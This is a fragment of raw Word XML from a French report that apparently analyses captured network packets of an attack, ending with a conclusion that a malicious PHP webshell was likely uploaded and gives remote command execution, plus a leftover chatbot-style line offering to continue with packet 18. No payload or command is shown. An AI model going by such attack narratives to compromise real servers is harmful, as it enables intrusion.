      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Apple Color Emoji" w:hAnsi="Apple Color Emoji" w:cs="Apple Color Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023FB07A" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cette réponse positive suggère que la tentative de compromission a cette fois fonctionné. Le fichier PHP malveillant a vraisemblablement été enregistré avec succès sur le serveur, sans qu’aucune erreur ne soit retournée. Le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> est donc potentiellement accessible à distance, ouvrant la voie à l’exécution de commandes arbitraires par l’attaquant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6061E1C1" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="261E941D" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Cette phase marque le point de bascule de l’attaque : le passage d’une simple tentative à une prise de contrôle fonctionnelle du serveur cible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E24F5B2" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="369CE087" w14:textId="6AF2B3B5" w:rsidR="00BC13CE" w:rsidRPr="006D2676" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Souhaites-tu que je continue avec le paquet 18 dans ce même style ?</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00BC13CE" w:rsidRPr="006D2676" w:rsidSect="009D6C8B">
      <w:footerReference w:type="even" r:id="rId13"/>
      <w:footerReference w:type="default" r:id="rId14"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="990" w:right="1440" w:bottom="1170" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
      <w:pgBorders w:display="firstPage" w:offsetFrom="page">
        <w:top w:val="single" w:sz="18" w:space="24" w:color="auto" w:shadow="1"/>
        <w:left w:val="single" w:sz="18" w:space="24" w:color="auto" w:shadow="1"/>
        <w:bottom w:val="single" w:sz="18" w:space="24" w:color="auto" w:shadow="1"/>
        <w:right w:val="single" w:sz="18" w:space="24" w:color="auto" w:shadow="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9C305A" w14:textId="77777777" w:rsidR="00B86FD1" w:rsidRDefault="00B86FD1" w:rsidP="00932AA4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5B1F484E" w14:textId="77777777" w:rsidR="00B86FD1" w:rsidRDefault="00B86FD1" w:rsidP="00932AA4">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="75C37C67" w14:textId="77777777" w:rsidR="00B86FD1" w:rsidRDefault="00B86F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Source Code Pro">
    <w:panose1 w:val="020B0309030403020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="variable"/>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1678180084"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="10C69EB4" w14:textId="0E5E2D50" w:rsidR="009D6C8B" w:rsidRDefault="009D6C8B" w:rsidP="0052078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0D084187" w14:textId="77777777" w:rsidR="009D6C8B" w:rsidRDefault="009D6C8B" w:rsidP="009D6C8B">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405352090"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="1E74A222" w14:textId="4D8A19C2" w:rsidR="009D6C8B" w:rsidRDefault="009D6C8B" w:rsidP="0052078F">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2D6BDFC7" w14:textId="77777777" w:rsidR="009D6C8B" w:rsidRDefault="009D6C8B" w:rsidP="009D6C8B">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B619C9" w14:textId="77777777" w:rsidR="00B86FD1" w:rsidRDefault="00B86FD1" w:rsidP="00932AA4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="61FF6086" w14:textId="77777777" w:rsidR="00B86FD1" w:rsidRDefault="00B86FD1" w:rsidP="00932AA4">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="79768051" w14:textId="77777777" w:rsidR="00B86FD1" w:rsidRDefault="00B86FD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9786B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FDD8F3D8"/>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B676AED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B018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954553"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F746CC8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01D2622"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="483E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535109"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1218930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0C90423"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D4D8F1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15F253F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1ACE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7B2993"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3848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5955137">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="77875150">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="912424843">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="191458302">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1618372541">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1951472936">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="228394290">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2003894459">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defaultTabStop w:val="720"/>
  <w:hyphenationZone w:val="425"/>
  <w:characterSpacingControl w:val="doNotCompres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5A2"/>
    <w:rsid w:val="000148E3"/>
    <w:rsid w:val="00016455"/>
    <w:rsid w:val="000228AC"/>
    <w:rsid w:val="00024BFE"/>
    <w:rsid w:val="00036A24"/>
    <w:rsid w:val="000377E6"/>
    <w:rsid w:val="00037AED"/>
    <w:rsid w:val="0004066C"/>
    <w:rsid w:val="0005774F"/>
    <w:rsid w:val="00060292"/>
    <w:rsid w:val="0006164C"/>
    <w:rsid w:val="00064D13"/>
    <w:rsid w:val="00065753"/>
    <w:rsid w:val="00065CF1"/>
    <w:rsid w:val="000725C0"/>
    <w:rsid w:val="00074E29"/>
    <w:rsid w:val="00083642"/>
    <w:rsid w:val="00086A14"/>
    <w:rsid w:val="00092D7B"/>
    <w:rsid w:val="00092F63"/>
    <w:rsid w:val="00093849"/>
    <w:rsid w:val="000A3BEA"/>
    <w:rsid w:val="000B1BAC"/>
    <w:rsid w:val="000F2954"/>
    <w:rsid w:val="000F3F48"/>
    <w:rsid w:val="000F5C1D"/>
    <w:rsid w:val="00100803"/>
    <w:rsid w:val="001020F8"/>
    <w:rsid w:val="00124446"/>
    <w:rsid w:val="00125F27"/>
    <w:rsid w:val="00141435"/>
    <w:rsid w:val="001438F3"/>
    <w:rsid w:val="0015659F"/>
    <w:rsid w:val="0016144D"/>
    <w:rsid w:val="00166577"/>
    <w:rsid w:val="00167223"/>
    <w:rsid w:val="00177E65"/>
    <w:rsid w:val="00190D4F"/>
    <w:rsid w:val="00195617"/>
    <w:rsid w:val="00195B77"/>
    <w:rsid w:val="001C741D"/>
    <w:rsid w:val="001C7A69"/>
    <w:rsid w:val="001F6544"/>
    <w:rsid w:val="001F6789"/>
    <w:rsid w:val="0020158D"/>
    <w:rsid w:val="00203102"/>
    <w:rsid w:val="00211726"/>
    <w:rsid w:val="00211B86"/>
    <w:rsid w:val="002128AC"/>
    <w:rsid w:val="00212F10"/>
    <w:rsid w:val="002212A6"/>
    <w:rsid w:val="00222143"/>
    <w:rsid w:val="00231762"/>
    <w:rsid w:val="002331ED"/>
    <w:rsid w:val="0025344D"/>
    <w:rsid w:val="00254B02"/>
    <w:rsid w:val="00261F9F"/>
    <w:rsid w:val="00267657"/>
    <w:rsid w:val="002676D9"/>
    <w:rsid w:val="00271A8C"/>
    <w:rsid w:val="002753E6"/>
    <w:rsid w:val="002763E4"/>
    <w:rsid w:val="00276897"/>
    <w:rsid w:val="00276A3C"/>
    <w:rsid w:val="00286286"/>
    <w:rsid w:val="002879FA"/>
    <w:rsid w:val="00292397"/>
    <w:rsid w:val="00297AFA"/>
    <w:rsid w:val="002B375F"/>
    <w:rsid w:val="002B4526"/>
    <w:rsid w:val="002C0225"/>
    <w:rsid w:val="002C54CE"/>
    <w:rsid w:val="002C7B39"/>
    <w:rsid w:val="002E5CCD"/>
    <w:rsid w:val="002F5439"/>
    <w:rsid w:val="002F5C9E"/>
    <w:rsid w:val="00317A99"/>
    <w:rsid w:val="00331235"/>
    <w:rsid w:val="00343AFD"/>
    <w:rsid w:val="003448E5"/>
    <w:rsid w:val="00365BD9"/>
    <w:rsid w:val="00372CA9"/>
    <w:rsid w:val="00372D49"/>
    <w:rsid w:val="0037555D"/>
    <w:rsid w:val="003766CA"/>
    <w:rsid w:val="0037781E"/>
    <w:rsid w:val="00395C99"/>
    <w:rsid w:val="003A0331"/>
    <w:rsid w:val="003A2DBD"/>
    <w:rsid w:val="003A76B8"/>
    <w:rsid w:val="003B4286"/>
    <w:rsid w:val="003C0CB0"/>
    <w:rsid w:val="003C35A2"/>
    <w:rsid w:val="003D19E9"/>
    <w:rsid w:val="003D1EB3"/>
    <w:rsid w:val="003D7343"/>
    <w:rsid w:val="003D7EED"/>
    <w:rsid w:val="00407A80"/>
    <w:rsid w:val="00412B3A"/>
    <w:rsid w:val="00416296"/>
    <w:rsid w:val="00416AF1"/>
    <w:rsid w:val="0042394C"/>
    <w:rsid w:val="00423A84"/>
    <w:rsid w:val="00424599"/>
    <w:rsid w:val="00424BE1"/>
    <w:rsid w:val="00441438"/>
    <w:rsid w:val="00447E2C"/>
    <w:rsid w:val="00455F88"/>
    <w:rsid w:val="00463422"/>
    <w:rsid w:val="0046585E"/>
    <w:rsid w:val="00471BB8"/>
    <w:rsid w:val="00477DBB"/>
    <w:rsid w:val="004A5A95"/>
    <w:rsid w:val="004B62D8"/>
    <w:rsid w:val="004C2237"/>
    <w:rsid w:val="004C6BE5"/>
    <w:rsid w:val="004D6EF4"/>
    <w:rsid w:val="004E01AD"/>
    <w:rsid w:val="004E7005"/>
    <w:rsid w:val="004F1787"/>
    <w:rsid w:val="004F2542"/>
    <w:rsid w:val="004F2B15"/>
    <w:rsid w:val="004F7C66"/>
    <w:rsid w:val="00505D31"/>
    <w:rsid w:val="00521612"/>
    <w:rsid w:val="0052582B"/>
    <w:rsid w:val="005309F7"/>
    <w:rsid w:val="005449AE"/>
    <w:rsid w:val="005456EB"/>
    <w:rsid w:val="00546023"/>
    <w:rsid w:val="00565240"/>
    <w:rsid w:val="005710BE"/>
    <w:rsid w:val="0057191B"/>
    <w:rsid w:val="005756C5"/>
    <w:rsid w:val="00575C65"/>
    <w:rsid w:val="005954F0"/>
    <w:rsid w:val="00596C96"/>
    <w:rsid w:val="005B4381"/>
    <w:rsid w:val="005C3788"/>
    <w:rsid w:val="005C393E"/>
    <w:rsid w:val="005C596E"/>
    <w:rsid w:val="005C5F10"/>
    <w:rsid w:val="005C6A78"/>
    <w:rsid w:val="005C7956"/>
    <w:rsid w:val="005C7B79"/>
    <w:rsid w:val="005E08E0"/>
    <w:rsid w:val="005E0F4B"/>
    <w:rsid w:val="00602193"/>
    <w:rsid w:val="00602AE2"/>
    <w:rsid w:val="00610050"/>
    <w:rsid w:val="00613ECF"/>
    <w:rsid w:val="00615726"/>
    <w:rsid w:val="00634E0C"/>
    <w:rsid w:val="00634EBF"/>
    <w:rsid w:val="0064016A"/>
    <w:rsid w:val="00645D6A"/>
    <w:rsid w:val="00656663"/>
    <w:rsid w:val="0067190E"/>
    <w:rsid w:val="00681B0B"/>
    <w:rsid w:val="0068325A"/>
    <w:rsid w:val="00694DD9"/>
    <w:rsid w:val="00697646"/>
    <w:rsid w:val="0069772F"/>
    <w:rsid w:val="006A2F1F"/>
    <w:rsid w:val="006A3732"/>
    <w:rsid w:val="006A6DFE"/>
    <w:rsid w:val="006A6E3A"/>
    <w:rsid w:val="006C1B00"/>
    <w:rsid w:val="006C767A"/>
    <w:rsid w:val="006D2676"/>
    <w:rsid w:val="006D2E0F"/>
    <w:rsid w:val="006E45A3"/>
    <w:rsid w:val="006E611C"/>
    <w:rsid w:val="006E7FCA"/>
    <w:rsid w:val="006F6C09"/>
    <w:rsid w:val="00720F50"/>
    <w:rsid w:val="007250DB"/>
    <w:rsid w:val="0074306D"/>
    <w:rsid w:val="00745926"/>
    <w:rsid w:val="00751852"/>
    <w:rsid w:val="007536EE"/>
    <w:rsid w:val="007644E3"/>
    <w:rsid w:val="007667FE"/>
    <w:rsid w:val="007724F0"/>
    <w:rsid w:val="007729BD"/>
    <w:rsid w:val="0077416A"/>
    <w:rsid w:val="00774204"/>
    <w:rsid w:val="00774D66"/>
    <w:rsid w:val="00774F4A"/>
    <w:rsid w:val="007A2A36"/>
    <w:rsid w:val="007A2BCD"/>
    <w:rsid w:val="007A6251"/>
    <w:rsid w:val="007B2D24"/>
    <w:rsid w:val="007E0000"/>
    <w:rsid w:val="007F5D2F"/>
    <w:rsid w:val="00806B5C"/>
    <w:rsid w:val="00817AFD"/>
    <w:rsid w:val="00817EF1"/>
    <w:rsid w:val="00823BA8"/>
    <w:rsid w:val="008245F1"/>
    <w:rsid w:val="008374F0"/>
    <w:rsid w:val="0085010B"/>
    <w:rsid w:val="0086491E"/>
    <w:rsid w:val="008653C0"/>
    <w:rsid w:val="008717CA"/>
    <w:rsid w:val="008769C1"/>
    <w:rsid w:val="008773BF"/>
    <w:rsid w:val="00880054"/>
    <w:rsid w:val="008810FA"/>
    <w:rsid w:val="00885DBD"/>
    <w:rsid w:val="00892562"/>
    <w:rsid w:val="00892597"/>
    <w:rsid w:val="00897625"/>
    <w:rsid w:val="008A2F3E"/>
    <w:rsid w:val="008B32CA"/>
    <w:rsid w:val="008B4A6A"/>
    <w:rsid w:val="008C1619"/>
    <w:rsid w:val="008C5E7F"/>
    <w:rsid w:val="008D482B"/>
    <w:rsid w:val="008E4F74"/>
    <w:rsid w:val="00901F04"/>
    <w:rsid w:val="009250B7"/>
    <w:rsid w:val="00931A05"/>
    <w:rsid w:val="00932AA4"/>
    <w:rsid w:val="009342B3"/>
    <w:rsid w:val="00937CFE"/>
    <w:rsid w:val="009407AA"/>
    <w:rsid w:val="00941451"/>
    <w:rsid w:val="00944F0C"/>
    <w:rsid w:val="00951144"/>
    <w:rsid w:val="00957F94"/>
    <w:rsid w:val="009653D7"/>
    <w:rsid w:val="00965524"/>
    <w:rsid w:val="00973B5A"/>
    <w:rsid w:val="00976091"/>
    <w:rsid w:val="00976A20"/>
    <w:rsid w:val="00977DB1"/>
    <w:rsid w:val="00985CCE"/>
    <w:rsid w:val="00995573"/>
    <w:rsid w:val="009A2E61"/>
    <w:rsid w:val="009A2F99"/>
    <w:rsid w:val="009B5967"/>
    <w:rsid w:val="009C3034"/>
    <w:rsid w:val="009C575C"/>
    <w:rsid w:val="009D0492"/>
    <w:rsid w:val="009D54D7"/>
    <w:rsid w:val="009D6C8B"/>
    <w:rsid w:val="009E1B6A"/>
    <w:rsid w:val="009E49E6"/>
    <w:rsid w:val="009F40C7"/>
    <w:rsid w:val="00A1489F"/>
    <w:rsid w:val="00A218CF"/>
    <w:rsid w:val="00A35124"/>
    <w:rsid w:val="00A40291"/>
    <w:rsid w:val="00A41774"/>
    <w:rsid w:val="00A4411C"/>
    <w:rsid w:val="00A44D8F"/>
    <w:rsid w:val="00A46043"/>
    <w:rsid w:val="00A4613F"/>
    <w:rsid w:val="00A52604"/>
    <w:rsid w:val="00A67E2F"/>
    <w:rsid w:val="00A7060C"/>
    <w:rsid w:val="00A70846"/>
    <w:rsid w:val="00A75E7A"/>
    <w:rsid w:val="00A775FB"/>
    <w:rsid w:val="00A84859"/>
    <w:rsid w:val="00AA3577"/>
    <w:rsid w:val="00AA5B2B"/>
    <w:rsid w:val="00AB1664"/>
    <w:rsid w:val="00AB598C"/>
    <w:rsid w:val="00AC1D1B"/>
    <w:rsid w:val="00AC73DE"/>
    <w:rsid w:val="00AC79BA"/>
    <w:rsid w:val="00AC7E4E"/>
    <w:rsid w:val="00AD414A"/>
    <w:rsid w:val="00AE05F3"/>
    <w:rsid w:val="00AE4E4F"/>
    <w:rsid w:val="00AF7888"/>
    <w:rsid w:val="00B034DC"/>
    <w:rsid w:val="00B110F3"/>
    <w:rsid w:val="00B1752A"/>
    <w:rsid w:val="00B326E3"/>
    <w:rsid w:val="00B346ED"/>
    <w:rsid w:val="00B35899"/>
    <w:rsid w:val="00B44C3D"/>
    <w:rsid w:val="00B6117E"/>
    <w:rsid w:val="00B61D02"/>
    <w:rsid w:val="00B70F80"/>
    <w:rsid w:val="00B72623"/>
    <w:rsid w:val="00B729F7"/>
    <w:rsid w:val="00B73AC4"/>
    <w:rsid w:val="00B820E6"/>
    <w:rsid w:val="00B86FD1"/>
    <w:rsid w:val="00B94188"/>
    <w:rsid w:val="00B954CC"/>
    <w:rsid w:val="00B97A4D"/>
    <w:rsid w:val="00BB4B42"/>
    <w:rsid w:val="00BB5818"/>
    <w:rsid w:val="00BC1014"/>
    <w:rsid w:val="00BC13CE"/>
    <w:rsid w:val="00BD1B60"/>
    <w:rsid w:val="00BD4731"/>
    <w:rsid w:val="00BD6C96"/>
    <w:rsid w:val="00BE0AC3"/>
    <w:rsid w:val="00BE5340"/>
    <w:rsid w:val="00BF49E4"/>
    <w:rsid w:val="00BF7D40"/>
    <w:rsid w:val="00C10025"/>
    <w:rsid w:val="00C16A08"/>
    <w:rsid w:val="00C201BB"/>
    <w:rsid w:val="00C227D5"/>
    <w:rsid w:val="00C23DCA"/>
    <w:rsid w:val="00C3541A"/>
    <w:rsid w:val="00C403CA"/>
    <w:rsid w:val="00C56222"/>
    <w:rsid w:val="00C66B16"/>
    <w:rsid w:val="00C742D5"/>
    <w:rsid w:val="00C77E0F"/>
    <w:rsid w:val="00C8246D"/>
    <w:rsid w:val="00C87E2F"/>
    <w:rsid w:val="00C901E5"/>
    <w:rsid w:val="00C92931"/>
    <w:rsid w:val="00C967F7"/>
    <w:rsid w:val="00CB3F52"/>
    <w:rsid w:val="00CC01D0"/>
    <w:rsid w:val="00CC39B4"/>
    <w:rsid w:val="00CC48DD"/>
    <w:rsid w:val="00CC6AF1"/>
    <w:rsid w:val="00CD7057"/>
    <w:rsid w:val="00CD7B69"/>
    <w:rsid w:val="00CE28B5"/>
    <w:rsid w:val="00CE2EC2"/>
    <w:rsid w:val="00CE62EE"/>
    <w:rsid w:val="00CE6D37"/>
    <w:rsid w:val="00CE743F"/>
    <w:rsid w:val="00CF4DFB"/>
    <w:rsid w:val="00D16441"/>
    <w:rsid w:val="00D23422"/>
    <w:rsid w:val="00D255D9"/>
    <w:rsid w:val="00D26C9E"/>
    <w:rsid w:val="00D32A9D"/>
    <w:rsid w:val="00D425EE"/>
    <w:rsid w:val="00D469BD"/>
    <w:rsid w:val="00D62830"/>
    <w:rsid w:val="00D643E6"/>
    <w:rsid w:val="00D73C26"/>
    <w:rsid w:val="00D74023"/>
    <w:rsid w:val="00D7628D"/>
    <w:rsid w:val="00D92F74"/>
    <w:rsid w:val="00DA3222"/>
    <w:rsid w:val="00DA5228"/>
    <w:rsid w:val="00DA70A8"/>
    <w:rsid w:val="00DC4DF7"/>
    <w:rsid w:val="00DD0BFF"/>
    <w:rsid w:val="00DD5934"/>
    <w:rsid w:val="00DE462C"/>
    <w:rsid w:val="00DF0244"/>
    <w:rsid w:val="00DF1058"/>
    <w:rsid w:val="00DF5734"/>
    <w:rsid w:val="00E0117C"/>
    <w:rsid w:val="00E1194C"/>
    <w:rsid w:val="00E23EFD"/>
    <w:rsid w:val="00E248BC"/>
    <w:rsid w:val="00E24D0F"/>
    <w:rsid w:val="00E25EF9"/>
    <w:rsid w:val="00E324A2"/>
    <w:rsid w:val="00E42668"/>
    <w:rsid w:val="00E57FCB"/>
    <w:rsid w:val="00E67A95"/>
    <w:rsid w:val="00E710D9"/>
    <w:rsid w:val="00E71F4C"/>
    <w:rsid w:val="00E73EAD"/>
    <w:rsid w:val="00E85F58"/>
    <w:rsid w:val="00E85F8C"/>
    <w:rsid w:val="00E9536F"/>
    <w:rsid w:val="00EA72BF"/>
    <w:rsid w:val="00EB3DE2"/>
    <w:rsid w:val="00EB6950"/>
    <w:rsid w:val="00EE582E"/>
    <w:rsid w:val="00EE6F9D"/>
    <w:rsid w:val="00EF25E5"/>
    <w:rsid w:val="00EF26A9"/>
    <w:rsid w:val="00F0154F"/>
    <w:rsid w:val="00F05ECD"/>
    <w:rsid w:val="00F07FF2"/>
    <w:rsid w:val="00F101A0"/>
    <w:rsid w:val="00F10EAD"/>
    <w:rsid w:val="00F134F7"/>
    <w:rsid w:val="00F20C13"/>
    <w:rsid w:val="00F3221A"/>
    <w:rsid w:val="00F3297C"/>
    <w:rsid w:val="00F36D1F"/>
    <w:rsid w:val="00F37DFA"/>
    <w:rsid w:val="00F6512A"/>
    <w:rsid w:val="00F74025"/>
    <w:rsid w:val="00F81410"/>
    <w:rsid w:val="00F87396"/>
    <w:rsid w:val="00F93C6A"/>
    <w:rsid w:val="00FA40B9"/>
    <w:rsid w:val="00FA7C99"/>
    <w:rsid w:val="00FB270F"/>
    <w:rsid w:val="00FB4F70"/>
    <w:rsid w:val="00FB61C8"/>
    <w:rsid w:val="00FB6754"/>
    <w:rsid w:val="00FC0E90"/>
    <w:rsid w:val="00FC0EF1"/>
    <w:rsid w:val="00FE0EBD"/>
    <w:rsid w:val="00FF0C21"/>
    <w:rsid w:val="00FF433D"/>
    <w:rsid w:val="086ADC62"/>
    <w:rsid w:val="0F6152CA"/>
    <w:rsid w:val="21C60241"/>
    <w:rsid w:val="2D758F31"/>
    <w:rsid w:val="2FD47482"/>
    <w:rsid w:val="3500C4FB"/>
    <w:rsid w:val="4378D3C5"/>
    <w:rsid w:val="4CB849AA"/>
    <w:rsid w:val="56BDBBEA"/>
    <w:rsid w:val="59E57F7A"/>
    <w:rsid w:val="64DBF2BB"/>
    <w:rsid w:val="744AD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61974"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2AFFDA0D-89EB-48BA-92AB-FEA1062AF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BAC"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre1Car"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00E324A2"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre2Car"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="006A6E3A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre3Car"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0042394C"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F4D78" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre4Car"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00A218C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25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932AA4"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="En-tteCar">
    <w:name w:val="En-tête Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="En-tte"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00932AA4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Pieddepage">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PieddepageCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00932AA4"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PieddepageCar">
    <w:name w:val="Pied de page Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Pieddepage"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00932AA4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00932AA4"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre1Car">
    <w:name w:val="Titre 1 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00E324A2"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre3Car">
    <w:name w:val="Titre 3 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0042394C"/>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42394C"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:b w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
